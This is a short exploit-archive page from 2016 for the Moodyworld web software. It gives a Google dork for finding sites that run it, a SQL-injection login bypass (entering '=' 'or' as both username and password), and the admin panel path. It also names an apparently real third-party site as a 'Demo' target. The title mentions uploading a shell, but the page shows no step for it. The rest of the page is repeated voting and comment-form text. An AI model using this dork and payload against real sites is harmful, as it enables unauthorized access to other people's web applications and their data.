Moodyworld Admin Bypass & Upload Shell

2016.08.20

MrHoudini (IR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Powered by Moodyworld"

# Exploit Title : Moodyworld Admin Bypass & Upload Shell
# Google Dork : intext:"Powered by Moodyworld"
# Discovered By : MrHoudini
# Contact Me : Mr.Houdini77@Gmail.com
# My WebSite: www.MrHoudini.ir
# Date : 20-8-2016
# Vendor Homepage : http://moodyworld.com/


Exploit : 

Username : '=' 'or'
Password :  '=' 'or'

Admin Panel :

Site.com/[PATH]/admin/

Demo : 

http://www.clickntrade.pk/admin/

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Moodyworld Admin Bypass & Upload Shell

Dork: intext:"Powered by Moodyworld"

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Moodyworld Admin Bypass & Upload Shell

Dork: intext:"Powered by Moodyworld"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.